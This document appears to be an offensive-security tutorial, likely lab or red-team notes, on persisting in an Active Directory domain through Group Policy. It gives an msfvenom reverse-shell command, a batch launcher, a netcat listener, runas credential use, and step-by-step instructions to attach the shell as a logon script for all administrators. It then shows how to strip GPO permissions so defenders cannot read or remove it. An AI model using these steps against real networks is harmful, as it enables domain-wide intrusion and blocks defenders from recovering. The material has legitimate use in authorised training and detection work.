Group Policy Management
Administrators - Remote Desktop Protocol (RDP)
Group Policy Management
(GPO) in AD provides a Central Mechanism to Manage the Local Policy Configuration of all Domain-Joined Machines. This includes Configuration such as membership to Restricted Groups, Firewall and AV Configuration, and which Scripts should be executed upon Startup. GPO can be targeted by Attackers to Deploy Persistence across the entire Estate. Even worse is that the Attacker can often hide the GPO in such a way that it becomes almost Impossible to Remove it.
- These are Common GPO Persistence Techniques:
Restricted Group Membership
- This could Allow us Administrative Access to all Hosts in the Domain.Logon Script Deployment
- This will ensure that we get a Shell callback every time a User Authenticates to a Host in the Domain.
Preparation
We will create a GPO that is linked to the Admins Organizational Unit, which will Allow us to get a Shell on a Host every time one of them Authenticates to a Host.
First we need to create our Shell
, Listener
, and the bat
file that will execute our Shell. After that we need to Transfer the Shell and the Batch Script to the Target System.
- Reverse Shell
- Batch Script
- Listener
- Transfer
:: Generate the Shell
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe -o <Shell Name>
:: Create a Batch Script with the Following Contents
copy \\<Domain Name>\<Location>\<Shell Name> C:\tmp\<Shell Name> && timeout /t 20 && C:\tmp\<Shell Name>
:: Start the Listener
nc -nvlp <PORT>
:: Transfer The Script to the Target System
certutil - scp - etc..
GPO Creation
RDP
as a Low-Privileged User and use the runas
Command to Inject the Administrator Credentials, and then execute MMC from this New Terminal.
:: This will Pop-Up a Prompt that will ask for the Credentials
runas /netonly /user:Administrator cmd.exe
:: In the New Terminal we can Execute [MMC]
mmc
Microsoft Management Console
(MMC):- Click File ➜ Add/Remove Snap-In...
- Add the Group Policy Management Snap-In.
- Click OK.
While we can Technically write our contents to the Default Domain Policy, which should propagate to all AD Objects, we will take a more narrow approach for the Task to show the Process. We will write a GPO that will be applied to all Admins.
Microsoft Management Console
(MMC):- Right-Click on Admins OU ➜ Create a GPO in this Domain, and Link it Here...
- Give our GPO a Name.
- Click OK.
- Right-Click on your Policy and select Enforced.
- Right-Click on your Policy and select Edit... This will Open the
Group Policy Management Editor
.
Group Policy Management Editor
:- Under User Configuration, expand Policies ➜ Windows Settings.
- Select Scripts (Logon/Logoff).
- Right-Click on Logon ➜ Properties.
- Select the Scripts Tab.
- Click Add ➜ Browse.
- Navigate to the Location where you Upload the Batch and Reverse Shell.
- Select your Batch File as the script and click Open and OK.
- Click Apply and OK.
This will now ensure that every time one of the Administrators (Tier 0 - 1 - 2) Logs into any Machine, we will get a Callback from our Reverse Shell.
Hiding
Now that our Persistence is Working. We can try to make sure the Blue Team can't simply remove our Persistence.
Microsoft Management Console
(MMC):- Click on our Policy and then Click on Delegation.
- Right-Click on ENTERPRISE DOMAIN CONTROLLERS and Select Edit settings, delete, modify security.
- Click on all other Groups Except Authenticated Users and click Remove.
- Click on Advanced and Remove the Created Owner from the Permissions.
- Click Apply and OK.
Right after we perform these Steps, we will get an Error that you can no longer Read your own Policy. By Performing these steps, we can ensure that even with the Highest Level of Permissions, the Blue Team would not be able to remove our GPO unless they impersonated the Machine Account of a Domain Controller. This makes it Extra Hard to Discover, and even if they Discover the GPO, it would be incredibly Hard to Remove.
We don't even have the Required Permissions to Interface with our Policy Anymore, so one will have to stay there until a Network Reset is Performed.